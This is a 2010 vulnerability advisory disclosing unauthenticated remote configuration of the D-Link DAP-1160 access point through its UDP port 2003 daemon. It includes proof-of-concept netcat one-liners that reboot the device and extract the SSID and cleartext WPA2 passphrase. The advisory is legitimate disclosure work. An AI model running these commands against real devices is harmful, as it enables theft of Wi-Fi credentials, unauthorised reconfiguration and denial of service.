D-Link DAP-1160 Unauthenticated Remote Configuration

`Security Advisory  
  
IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration  
  
  
  
Advisory Information  
--------------------  
Published:  
2010-06-28  
  
Updated:  
2010-06-28  
  
Manufacturer: D-Link  
Model: DAP-1160  
Firmware version: 1.20b06  
1.30b10  
1.31b01  
  
  
  
Vulnerability Details  
---------------------  
  
Public References:  
Not Assigned  
  
  
Platform:  
Successfully tested on D-Link DAP-1160 loaded with firmware versions:  
v120b06, v130b10, v131b01.  
Other models and/or firmware versions may be also affected.  
Note: Only firmware version major numbers are displayed on the  
administration web interface: 1.20, 1.30, 1.31  
  
  
Background Information:  
D-Link DAP-1160 is a wireless access points that allow wireless clients  
connectivity to wired networks.  
Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported.  
  
  
Summary:  
Unauthenticated access and modification of several device parameters,  
including Wi-Fi SSID, keys and passphrases is possible.  
Unauthenticated remote reboot of the device can be also performed.  
  
  
Details:  
DCCD is an UDP daemon that listens on port UDP 2003 of the device, that  
is likely used for easy device configuration via the DCC (D-Link Click  
'n Connect) protocol.  
By sending properly formatted UDP datagrams to dccd daemon it is  
possible to perform security relevant operation without any previous  
authentication.  
It is possible to remotely retrieve sensitive wireless configuration  
parameters, such as Wi-Fi SSID, Encryption types, keys and passphrases,  
along with other additional information.  
It is also possible to remotely modify such parameters and configure the  
device without any knowledge of the web administration password.  
Remote reboot is another operation that an attacker may perform in an  
unauthenticated way, possibly triggering a Denial-of-Service condition.  
  
  
POC:  
- Remote reboot  
python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003  
  
- Retrieving Wi-Fi SSID  
python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt  
-u <IP_ADDR> 2003  
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the  
received datagram)  
  
- Retrieving WPA2 PSK  
python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' |  
nc -u -o pass.txt <IP_ADDR> 2003  
cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the  
received datagram)  
  
  
Impacts:  
Remote extraction of sensitive information  
Modification of existing device configuration  
POssible Denial-of-Service  
  
  
Solutions & Workaround:  
Not available  
  
  
  
Additional Information  
----------------------  
Timeline (dd/mm/yy):  
17/02/2010: Vulnerability discovered  
17/02/2010: No suitable technical/security contact on Global/Regional  
website. No contact available on OSVDB website  
18/02/2010: Point of contact requested to customer service  
----------- No response -----------  
26/05/2010: Partial disclosure at CONFidence 2010  
28/06/2010: This advisory  
  
  
Additional information available at http://www.icysilence.org  
`